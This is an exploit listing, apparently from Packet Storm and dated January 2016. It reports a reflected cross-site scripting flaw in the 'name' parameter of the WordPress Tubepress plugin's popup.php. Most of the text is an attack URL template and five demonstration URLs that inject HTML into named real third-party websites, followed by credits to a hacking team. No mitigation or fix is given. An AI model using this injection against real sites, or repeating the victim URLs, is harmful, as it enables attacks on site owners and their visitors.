WordPress Tubepress 2 Cross Site Scripting

2016-01-13T00:00:00
ID PACKETSTORM:135238
Type packetstorm
Reporter Ac!D
Modified 2016-01-13T00:00:00

Description

                                        
                                            `[^][^][^][^][^][^][^][^][^][^][^]  
[^] Exploit Title : Wordpress Tubepress Plugin v 2 Cross Site Scripting  
[^] Exploit Author : Ashiyane Digital Security Team  
[^] Vendor Homepage : https://wordpress.org/plugins/tubepress/  
[^] Date: 13 Jan 2016  
[^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel  
[^]  
[^][^][^][^][^][^][^][^][^][^][^]  
[^] Vulnerable PHP File = common/ui/popup.php OR common/popup.php  
[^] Vulnerable Parameter = name  
[^]  
[^] Attack Like :site/wp-content/plugins/tubepress/common/popup.php?name=[XSS]  
[^]  
[^][^][^][^][^][^][^][^][^][^][^]  
[^] Demos :  
[^]  
[^]   
http://inmafoundation.org/wp-content/plugins/tubepress/common/popup.php?name=</title><font   
color=white>Ashiyane</font>  
[^]  
[^]   
http://www.frenzygraphics.com/wp-content/plugins/tubepress/common/popup.php?name=</title><font   
color=white>Ashiyane</font>  
[^]  
[^]   
http://www.brothersgonnaworkitout.com/clientarea/greenparty/wp-content/plugins/tubepress/common/popup.php?name=</title><font   
color=white>Ashiyane</font>  
[^]  
[^]   
http://www.twisters.info/wp-content/plugins/tubepress/common/popup.php?name=</title><font   
color=white>Ashiyane</font>  
[^]  
[^]   
http://trueworldonline.com/wordpress/wp-content/plugins/tubepress/common/popup.php?name=</title><font   
color=white>Ashiyane</font>  
[^]  
[^][^][^][^][^][^][^][^][^][^][^]  
[^] Discovered by : Ac!D  
[^] tnQ: EhSan D3s!6n37 ,H.empire , M.hidden , Linx64 , B0z0rgmehr ,   
Maziar , N3TC@T  
[^] M.a.M.a.D , M.hacking , Sh.BlackHAT , V For vendetta , Sh.Cloner & Hassan  
[^][^][^][^][^][^][^][^][^][^][^]  
`